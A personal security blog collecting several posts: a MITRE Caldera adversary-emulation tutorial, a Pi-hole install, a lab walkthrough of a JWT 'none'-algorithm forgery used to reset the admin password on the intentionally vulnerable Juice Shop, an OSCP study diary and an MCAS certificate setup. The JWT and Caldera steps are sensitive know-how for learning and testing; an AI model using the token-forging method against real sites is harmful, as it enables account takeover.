MITRE Caldera – Emulating an Adversary

Perishable threat intelligence – when a new attacker enters the fray or when an existing threat actor changes their tactics, inevitably the various security firms will publish threat intel on these attacks. IOCs expire quickly and grow more stale than the box of cereal your kids raided and failed to reseal in an instant. This does not, however, mean that threat intel should be completely ignored. In fact, it provides value in a few different spaces. In this blog post, I am going to focus on how to use threat intel with MITRE Caldera in order to mimic an adversary. You may want to do for this for a few different purposes. The first purpose might be in the event you are looking at doing a product evaluation. Can endpoint security tool X protect, detect, and help you respond to these attacks? The second way that this can be helpful is in training your SOC and responders. What does the telemetry look like? Do we have all the detections in place necessary to see all the various components across the kill chain in these specific attacks? By leveraging the threat intel in these ways, you can know if you are potentially able to handle these categories of attacks regardless of how attackers morph them. Since the defenders are almost always 1+ steps behind, it is important to utilize the threat intel to help ensure you have the tooling and expertise you need across entire categories within the kill chain.

MITRE Caldera: https://github.com/mitre/caldera

Documentation: https://caldera.readthedocs.io/en/latest/

I HIGHLY recommend running through the content within the Training plugin once you have the product installed. It will give you a solid base in understanding with the product. If you complete the training, you even have the opportunity to turn in a flag to MITRE and they will send you a certificate of completion.


Step 1: Installing the Red Agent

I am going to be using a Windows 10 machine. In order to really see what an adversary would be able to do on the endpoint, I am going to disable all of the Defender oriented protections on the VM including real-time protection as well as any of the mitigating controls that are contained with Attack Surface Reduction (ASR) such as Controlled Folder Access, Exploit Guard, Network Protection, etc. There is a whole host of capabilities built right into Windows 10 that stop most attackers dead in their tracks if the protections are enabled and configured correctly. Windows 10 really is a secure operating system if the full Defender stack is enabled.

Next, I am going to deploy the Sandcat agent (54ndc47) to the machine. Since I do not have a user to phish or anything like that, I just go ahead and deploy the agent by hand to get communication rolling. Caldera does a great job of giving you a PowerShell command customized to your environment if you just fill in the IP of your Caldera machine.

All I have to do is bring the command over to my victim machine, run it, and I will have the ability to attack. Notice, however, the last line of the PowerShell command will actually run the agent in a hidden window. I like to see what is going on so I am going to run the command a little differently so that I can see what is happening with the agent. There are different command line options that can give you verbose output.

As you can see here, I am running the agent in a way that displays verbose output. This will let me know when activities hit the agent which is nice for the purposes of demoing and troubleshooting.

Above is the display of the new agent reporting into the red console within Caldera. Notice that I am running the agent as elevated. I would hope that any kind of phishing would land an attacker within a customer’s environment in the user space and not directly to admin, however, basic mitigations such as removing local admin and deploying tooling such as LAPS is still unfortunately not the norm. If at all possible, implement as many of mitigations from the Securing Privileged Access roadmap located here: https://aka.ms/sparoadmap. Basic account segmentation, credential hygiene and built in security controls available on/within most modern operating systems is enough to stymie the a significant portion of attackers except for the most determined adversaries conducting a targeted attack. Now that we have an agent reporting into Caldera, let us look at constructing a basic adversary.

Step 2: Constructing an Adversary

Within the Caldera Red dashboard, Navigate -> Adversaries. Hit the slider so that it moves from VIEW to ADD

Top center, it is kind of grayed out but find the spot that says “enter a profile name” and do so

Becomes

On the far right, we have the option to link and objective, add an adversary, and/or add ability. For this demo, we are going to focus on MITRE tactics, techniques, and procedures (TPPs) so we are going to add an ability

This brings up a new screen that allows us to browse to the TTPs we want to add to our adversary. The first dropdown list displays a list of the different tactics aligned to the MITRE framework.

I am going to go with discovery. Once I select discovery, techniques are populated in the next drop down that once again align to the MITRE framework

I am going to select T1082 – System Information Discovery. This lights up 12 associated abilities. These are basic endpoint enumeration capabilities that let you snag the version of the OS and other basic system information from the endpoint. I am going to add a few of these to my adversary. When I select one of these, I can view the code and the associated information for each of the supported platforms. This is really nice as it shows how these abilities are constructed which can lend itself nicely to constructing your own custom TPPs down the road.

Down at the very bottom, hit Add to Adversary. Now, the new adversary looks like this:

I am going to add a few more for discovering additional system information NOTE – since I am going after a windows machine, I need to make sure whatever ability I select actually has Windows as an option or I would need to potentially add my own code. For example, if I select List OS Information, I can look at the bottom and see that there is code for Darwin (Mac) and Linux – but there is no Windows! I am thinking I could easily create a new ability and add an executor for this that would run the systeminfo command on the endpoint.

  • Reset button to clear all options
  • Generate new id (sets the GUID)
  • Name = Custom – List OS Information
  • Description = Identity System Info
  • Tactic = discovery
  • Technique ID= T1082
  • Technique = System Information Discovery
  • Add executor
  • Platform = Windows
  • Executor = psh
  • Command = systeminfo
  • Timeout = 60

Leave the rest. Save and then add it to our adversary.

Notice that this activity actually now covers all 3 platforms

At this point, you can add as many techniques that align to your threat intel into your new custom adversary. I am not going to add any more for demo purposes and instead I am going to go ahead and save my adversary

Now, I can run an operation against my agent that I had previously deployed. Let us see if I get results! Step 3: Run an Operation Navigate -> Operations Change view to Add

  • Name = Customer Adversary Test Operation
  • Group = red (in my environment there is only 1 group and the agent is assigned to this group)
  • Adversary = Blog Post Demo Adversary

Leave the rest and hit start. This should attack my agent with basic recon TTPs. After I hit start, I have to wait for the agent to beacon but then I see the agent starting to run the activities I have associated with the operation

Troubleshooting – if your activities do not run (or they just are not displayed), you can download the report and it will potentially tell you which TPPs are not executed and even potentially why. For example, on first pass with this blog post I set the executor for the custom activity to cmd and it failed to load and run. I did not dig into the details (suspect it required cmd line param format for the executor) but I switched it to psh and now it runs just fine.

And I can view the details by clicking the star icon to the right

Cool stuff! With this, I can take perishable threat intel and use the Caldera tool to simulate the types of activities these actors are executing in the wild. This approach lets me test my tooling to ensure I have visibility and potentially protection and control in these spaces within my environment. I can train my SOC to look for these TPPs and the activities associated with various threat actors and campaigns. This can be very powerful if used in the right way.

MITRE, OffSec, Security

Pi-hole – Life Changer? Maybe…

The Internet seems to run on advertising – and that is fair. Companies and individuals need to find a way to monetize their products and data without hiding everything behind paywalls. With that being said, there are plenty of sites and services with ill intent when it comes to harvesting data, counting clicks, analyzing and attributing browsing habits, etc. As a consumer, a daily user of the Internet, and one who actually relies on the Internet for my livelihood, I feel it is very important to protect myself and my family’s online activities.

Enter Pi-hole

https://pi-hole.net/

What is Pi-hole? It is an application that runs on Linux (which could be running on a Raspberry Pi) that acts as a DNS sinkhole. When traffic from your network is looking to route to an unwanted domain on the Interwebs, Pi-hole simply refuses to respond with an IP address of the destination. This is a pretty slick way to head off adware and other dynamic content that gets rendered in a lot of sites. For me, I absolutely despise when I browse to a site, start reading and then the whole page rearranges/shifts because an ad pops.

I was surprised at how easy this was to set up. First, a key point: Pi-hole does NOT require that you purchase a(nother) Raspberry Pi – it can run in a few different ways. First, it can run as a Docker container (awesome) or you can simply install it on the various operating systems that are supported. I have a beefy (if old) Hyper-V server running in my basement, so, for my purposes, I chose Ubuntu 18.04 – mostly because I already have a VM image created. I fired up a new copy of the image, sudo update && sudo upgrade and then away we go.

Install

https://github.com/pi-hole/pi-hole/#one-step-automated-install

I read through the install and chose to install this with the One-Step Automated Install. It is a VM – if something goes wrong, I can revert to a new image since nothing else is happening on this machine anyway. The One-Step install went almost perfectly. It was fast and I only hit one minor snag post install – DNS resolution on the machine was pointed to 127.0.0.53 in the /etc/resolv.conf file. I changed the file so that DNS is now resolved via my router (forwarded to ISP).

The next step was to set the Pi-hole admin password. From my reading it sounds like I might have missed a password getting set during the install and being displayed the screen. No biggie, the password can be set by a machine admin:

The last step to configure Pi-hole was to update Gravity. I am not 100% sure this is a required step in order to get the Pi-hole working initially, however, things started working almost instantly (and awesomely) immediately after I ran the update. Basically, Gravity takes all your block lists, consolidates them, and then that’s the list that is then used to sink unwanted requests:

The only thing left to do at this point is to change the DNS settings in my environment so that my machines all start using the Pi-hole for DNS. For me, this actually meant temporarily cutting over to the built in DHCP server that the Pi-hole provides for the purposes of this blog post.

Note – disable any other DHCP services running on the network.

24 hours later

Wow, what a difference.

Sites that are riddled with ads and out of control JS that cause me to want to hulk smash the keyboard because the content moves after I have started reading…are no longer misbehaving. Games on my cell phone…playable! What a massive improvement in the user experience. And I now have the ability to pull in additional lists or purposefully block sites and services in my environment by simply adding them to the list. I already love it, and this is going to be a very handy tool to have for testing purposes.

Automation, Security, Web Attacks

Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT token attacks which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce and then leverage that attack into elevated access on a site. The BHIS session for JWT attacks on the day of 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored the app some to enumerate users. In the session we didn’t get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site I decided to try and attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:

And I was able to browse the site:

 

Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed and then I can use that to try and craft a new token as my victim user. I went to login – created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and notice calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and Send to Repeater
    5. Now I need to learn if I need to attack the Authorization Bearer token, the token in the cookie or both
      1. I added a letter to auth header (basically break it) – no change on send
      2. I added a letter to the cookie and it breaks – this is the one that matters

Before:

After:

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT token – I can tell because it’s <base64URLencoded-header>.< base64URLencoded -payload>.< base64URLencoded -signature> – 3 base64urlencoded strings separated by periods:

  2. I copied the header into Decoder, decode as Base64, change “RS265” to “None” and then encode as base64. The new string is my new header. I paste this into a document off to the side for later use

     

    ** NOTE – the “=” sign will break the header. These need to dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address and then reencoded as base64:

    And change it to this and then encode it as base64

  4. I copied the new payload and then pasted the new header and payload into repeater. Drop the signature (since we now have “none” in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to consistently work. In order to get the return I wanted I ended up removing headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! With that, I doubt that the id of the admin user is 18 (this is the id for my hack@hack.com account I created). Most likely, admin is going to be an id of 1 so I changed that in the token, encode and resend. Result:

Step 5: JWT Attack

  1. I now have a JWT token that is accept by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token and chose to attack the password change functionality. I went into password reset on my account to change the password:

    And change the password to “password1”:

  2. Looking at this traffic in Burp:

  3. I simply take and replace the Authorization token with the newly crafted JWT and replace the entire cookie in this new request from the previous Repeater request:

    I get a 200 back and the password is shown there within the returned payload. Turns out this is the MD5 of the password I did in fact just set. Now, can I login with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways:

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like

Good stuff!

Security, Web Attacks

OSCP – My Beginning, My Fall, My Rise and My Resources – Just Like Batman

I officially got notice today (5/26/2020) that I passed my OSCP exam. I am going to keep this light with a focus on study resources as there are many and better writeups on how to tackle the OSCP. It took me about a year and two test attempts, but I finally made it. This was the hardest singular exam I have ever taken as the breadth of knowledge required and my starting point made this quite a significant task. My boss provided the funds for me to purchase the course materials last summer (2019 – thanks Tavis!) and I studied/focused on the book material right out the gate…huge mistake. I let my lab time expire and barely touched it. At the time of expiration, I had popped a single low privilege shell using SQLMap (not even allowed on the test) and had 0 additional success prior to lab expiration. I knew I was no where near being ready, so I turned to forums and found folks were prepping by working with machines from Vulnhub and Hack The Box. Prior to my first attempt at the test (Feb 2020) I did purchase 15 days of lab time to see what I could do, and I had quite a bit of success. I attempted and failed the test in Feb 2020 due to time management – shocker! This is a common reason folks post for failing and I now wholly understand why. In April of 2020 I attempted a second time with a different strategy and came out on top!

Resources

I took a lot of guidance from this post: https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt

Here were the materials I really used to prep for the exam

    1. Read the book
    2. Attacked the lab (especially with the second block of time)
    3. Watched the videos – sort of
      1. Probably could have gotten more value here
    1. As many of the solved easy-medium ones as I could
      1. Requires the VIP subscription but this is like $120/year
  1. VulnHub – OSCP-Like
    1. https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
  2. Buffer Overflow Practice
    1. https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
    1. Watched all CTF Windows Easy
    2. Watched most CTF Windows Medium
    1. These are amazing!!!

My Study Strategy

I really took to heart the blog post from LRNZO above and followed the guidance. For some reason, it really resonated with me on reading, so I settled on that for my strategy. I dove in and heftily focused on OSCP like machines across HTB and VulnHub. I spent very little time using or learning Metasploit – just the basic commands needed to attempt and exploit or to use the multi-handler. My intention was to conquer all of the machines without Metasploit or at least attempt them without having to use it. In retrospect, I think I should have spent a little more time here and learned the tooling better as I do think one of the test machines I ran into specifically was potentially meant to be cracked with MS and I didn’t end up getting that one. I really got the most value from the retired HTB machines and the writeups. I would attempt these machines myself and then read the writeups post to see if there were things I could have done differently. It is always pretty humbling to see how bad you struggle doing something and then watch something like an IPPSec video on it and he would show you 3-4 different ways to accomplish. The best/craziest part about learning all of this really comes down to the Einstein quote – “The more I learn, the more I realize how much I don’t know”….so very true. Here are where Rana Khalil’s writeups were awesome as well – I loved her approach on recon and how concise her writeups were.

Key element for sure – focus on the basics and recon, recon and then recon some more. Enumerate. Find the nooks and crannies until something presents itself. I cannot tell you how many machines I have solved now when I have given up all hope (almost) and then tried just one more thing…and then the lid blows off. This even happened during the test. I am coming to find that mindset is key and mental endurance (especially during the test) is a necessity.

Time Management

Test Take #1: Wow did I fail on this the first time around. I read a lot of blog posts on how to tackle the test. I decided to go with the early morning start – get the test rolling as I would my normal work day, hit the BOF right out the gate, plan to have 60-65 pts by dinner, take a break to hang with the family, crack the rest of the machines by midnight and get a good night’s sleep with a score of 100 – heh, that didn’t happen. Rather, I hit a snag with the BOF, spent around for 2-3 extra hours flummoxed there (something silly) started reconning the other machines late, ended up in a mental tailspin and completely defeated myself by late eve. I think I may still have only had the BOF (25 pts) at midnight and that was largely due to my approach, my frustration and my deviation from the game plan. I kept looking for the quick easy win rather than working the recon and making sure I was not missing something. I had a printed-out playbook on what to do and how to recon based on service enumeration which went completely out the window as I sought homerun after homerun. You have to go into the test with a game plan and STICK TO IT. In the wee hours of the morning, I was exhausted and mentally defeated. If I would have submitted the report, I think I would have been around 55 pts when the clock ran out.

Test Take #2: The approach on this attempt was way different. First, a lot of the blog posts suggest doing to the BOF right out the gate and getting it out of the way – I say nay to that. Rather, make sure you are comfortable as you can be with them and do the BOF when your brain is fried. That is why you practice anything – so you develop the muscle memory and you can execute it in your sleep. I took the opposite approach as to when to start this time as well – rather than starting with my normal day and then spending my exhausted time in front of the keyboard when it was dark outside and I am normally asleep, I started my test at 6PM so that I would spend my truly exhausted time during the day when the sun was out and I would normally be working. 6AM came around the next morning, I was still chugging, I put on a pot of coffee and I pulled a true all-nighter never actually having my head hit the pillow during the test. I only ended up with 70pts (I was oh so close on another machine right as the clock ticked off) but the point is that I was actually still going strong(ish) at the end.

For this, you have to do what you think will be right for you, however, for me it came down to figuring out how I was going to be able to stay positive enough to defeat Debbie Downer when she came knocking. Fatigue is a mighty foe and not to be trifled with.

Advice

I’ve been hit up a few times now on folks looking to start their OSCP/Pentesting/Cybersecurity journey asking me how to get started. I would say that the OSCP is maybe not so much where to start your cybersecurity trek, however, if you are looking to specifically to get started with pentesting and learning this tooling then the most important thing to understand is that it is totally OK to fail…but not too fast. You need to feel the pain. Don’t hit the walkthroughs, blogs or forums too fast when working a machine, but don’t wait forever either. Make sure you are truly stuck and then go and get the answer you need to move onto the next step. The whole “Try Harder” crud is garbage (IMO) – smashing your face into the same wall over and over does not teach you anything. Do your best to make sure you are truly at a dead stop and then go get the answer you need to move to the next step. Make sure you understand what it took to overcome that block and tuck it away in your utility belt for next time (aka learning) – this is especially true early on. If you could already solve all of these machines and you had infinite time then “Try Harder” might apply, however, thinking back to math in HS and college there was a reason the odd numbered questions had their answers in the back of the book….

Additional Resources

These are ones I just want to call out as coming in very handy in prep for the test. There is so much to learn and so many resources out there that provide invaluable insight and capabilities it would prove impossible to list them all. The most important resource is most likely your favorite search engine.

Pentestmonkey Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Nishang: https://github.com/samratashok/nishang

Crackstation: https://crackstation.net/

GTFOBins: https://gtfobins.github.io/

Footnote

I do have to add a special footnote here and say thanks to my wife. She watched the kids while I studied and had to tackle them fully on her own the full day of the test. With a 3 and 7-year-old at home, no small feat and this was in the midst of shelter at home. Thanks Erin!

OffSec, OSCP, Security

MCAS – Device Identity via Certificates and Progressive Web Apps

I have a customer scenario where we needed to explore leveraging certificates in order to identify corporate Windows 10 machines for the purposes of preventing corporate data from being downloaded from O365 services to non-corporate assets. There are a few different ways that this can be tackled, however, other routes proved to be dead ends for various technical reasons, so it was landed on leveraging device certificates via MCAS in order to control data spillage.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#managed-device-identification

Utilizing device identity via MCAS with certificates does mean that your user traffic for the devices with certs (and without) will have to go through Conditional Access App Control for all the sessions (reverse proxy). It took some trial and error to get this to work. I do want to point out that this method is technically not supported for O365 services as proxying traffic for O365 can impact the user experience and impact the SLAs.

Scenario

  1. Hybrid Azure AD Joined machines will be allowed to access corporate resources unfettered
  2. Corporate devices without HAADJ will have a certificate deployed to them. The certificate will be used in a session control policy via MCAS to allow the device to download corporate data from O365
  3. Devices without certificates (corporate or otherwise) will be treated as untrusted. They will still be allowed to access corporate data (as allowed by other conditional access policies outside of the scope of this blog) but they will not be allowed to download data from O365

Hybrid Azure AD Join: https://docs.microsoft.com/en-us/azure/active-directory/devices/hybrid-azuread-join-managed-domains

HAADJ is a function of AAD and AAD Connect where machines are effectively synced from your on-prem AD into AAD. If a device has been synced, that information can be leveraged within conditional access policies as a piece of criteria during authentication. At this point, you can decide to request additional controls (such as MFA), whether to allow or block access, and even potentially drop the session into the MCAS reverse proxy for additional session control. In order to cover these scenarios for my lab, I configured two conditional access policies – the first policy enables the scenario I want to allow and the second policy blocks the rest.

Policy #1 – ITOp5 – RP – Block Download without Cert

My target user is ITOp5 in my lab. This is a standard user account that has been synced from the on-prem AD via AADC.

Apps – I went lazy for this and simply selected all apps

Conditions

Only targeting Windows since this was my client’s use case

Only allowing browser – the reverse proxy only works with the browser. Since that is the case, we are only going to allow browser based access.

For device state, we want to include all devices…

But exclude devices that are actually compliant (this is a 2-fer and how we catch all 3 scenarios with 2 conditional access policies)

In this case, I am only granting access, but additional controls and requirements could be implemented

Lastly, I am putting my user into Conditional Access App Control aka the reverse proxy if the above criteria is met

Policy #2 – ITOp5 – Block Non Browser on Non Compliant Devices

This policy is almost exactly the same with two exceptions. The first exception is Client apps – in the allow policy this is set to Browser. In the block, this is set to everything else

Lastly, rather than grant the policy is set to block

With these CAPs, folks coming in on a Windows machine either need to be marked compliant via Intune or have their devices HAADJ in order to have full access to all resources and to be able to use thick client apps. Everyone else is going to be routed into the reverse proxy. For the proxied users, if they have a certificate, they will be allowed to download data to their endpoint. If they do not have the certificate, the user will be forced to leverage the cloud-based tools within O365 to collaborate and work with corporate data.

MCAS – Session Control Policy

Configuration here is straight forward. It is a Control file download (with DLP) policy. For the criteria, it is going to specifically target my test user and block if the user does not have the certificate. Given that, the criteria is going to be targeted to the devices that do not have a valid certificate

For the file criteria I could get specific and try to stop content specifically with PII, financial data, HIPAA, etc. but I really want to stop all egress in order to prevent non corporate devices from coming under potential eDiscovery. With that, the criteria for what I am looking for is left blank to catch all content

Lastly, the policy is set to block with a custom block message. Notifications are optional

This is it! Other than getting certificates to the end points a HAADJ joined machine should be allowed to connect regardless of app. An unmanaged device should be routed into the reverse proxy and data egress should be blocked.

Verified this was the case in lab with this configuration and I have the behavior I want.

Device Certificate

For the root cert that goes into MCAS, it just needs to be the base64 encoded public cert (.CER) file that you import. Simply export, import and done.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#client-certificate-authenticated-devices

The device identification mechanism can request authentication from relevant devices using client certificates. You can either use existing client certificates already deployed in your organization or roll out new client certificates to managed devices. You then use the presence of those certificates to set access and session policies.

Not a ton of detail – this suggests that a device certificate on the endpoint should be sufficient. There is a little more detail further in the article that suggests an SSL certificate. From my testing, I have found that the ultimate requirement for this certificate itself is that it has Client Authentication in the Extended Key Usage. Lastly, the certificate needs to be installed into the user’s personal store – the local machine store will not work.

Walking through the process using a MS PKI to deploy the cert – this is probably not the most efficient and is definitely not the route you would go to deploy certificates in bulk to end users. This is purely the process I used and I wanted to document it here to show how I get a cert manually into the end user store.

Certificate Authority Template

I duplicated the Web Server Template, added Server and Client Authentication in for Extended Key Usage. I then published the template for use within in CA.

End User Certificate Request

I am doing this manually with a certificate signing request. On the endpoint, create a request.ini with the following and run the certreq command

I took the output in the csr6.req file and pasted it into the CertSrv site requesting a certificate utilizing the custom Web Server template I created with Client and Server authentication in the EKU

I downloaded the .cer file, copied it to the target workstation and than ran the following to import the cert directly into the user’s personal store

At this point, we can validate that the browser is able to see the certificate by going into Settings -> Search for Certificates

I can also see the certificate if I go into the certificate manager and look in the user’s personal store

Now, when I browse to O365 I hit the login page, I provide my username and then password. Immediately post password, I get the following

I select my certificate and hit ok. This allows me into O365. At this point, I can browse anywhere in the cloud service and download files since I now have a valid certificate that I presented immediately post authentication to the reverse proxy. Given how the conditional access policies are configured, this prevents all non browser apps from accessing the services. This means that only machines that are HAADJ or Intune managed (and compliant) are allowed to use thick client applications. Machines outside of that are allowed to access O365 but are not allowed to download content unless they have the certificate. Even the machines with the certificate are forced into use the web apps for O365 as applications like Outlook, Teams, OneDrive sync, etc. are not allowed to connect directly to the service. These users with the cert would be able to download content directly to their machine and work on it offline but they would then have to re-upload the content via the browser when it came time.

Progressive Web Apps

PWAs introduce and interesting option for enabling productivity but still flowing the traffic through and controlling data egress via the reverse proxy. This is very slick and I use PWAs for sites/apps both for O365 and otherwise.

https://docs.microsoft.com/en-us/microsoft-edge/progressive-web-apps-edgehtml/get-started

That’s the dev resource for PWAs so what does this actually mean for O365? You can pin specific sites (like Outlook and Teams) as PWAs on a machine. They are still web apps, but they get better performance, they get extra caching and they all the nice little tweaks to make them _almost_ as good as the thick client. Keep in mind, the _almost_ is my opinion and it does depend on the app. For example, I use a music stream service on home machine. The app for the stream service is a resource hog. I pin the PWA for that app and it is significantly lighter on resources on my machine. I think each web app (both in and out of the MS ecosystem) warrants exploring.

Edge Chromium

Summary

Requirements for leveraging Device Certificate via MCAS to block downloads of corporate data to unmanaged devices

Device Certificate Requirement

  • Certificate has Client Authentication in the Extended Key Usage
  • Certificate is located in the user’s personal store

Conditional Access

  • Non browser apps are blocked for the targeted users – required or the session will not be routed into the reverse proxy and this negates the usage of the certificate in order to allow/block downloads
  • Browser access is set to be granted through Conditional Access App Control

MCAS Session Control Policy

  • Block downloads of all data to devices that are not tagged with having the certificate

Resultant Scenario

  • All users off network and/or in scope would be forced to use web-based clients for a connected experience. This means thick client apps such as Outlook, OneDrive Sync, Teams and even tools like Excel and Word will not work when connecting directly to cloud data
  • All users with a valid certificate would be able to download the data and work with tools like Word and Excel in an offline mode and then reupload the data into SharePoint or OneDrive
  • Progressive Web Apps provide a nice alternative to thick clients and/but they do not allow local disk access
  • End users would still have full access and be able to use the web-based collaboration tools within the cloud without allowing egress of data to their endpoints

Happy MCAS-ing!

Hack Job, MCAS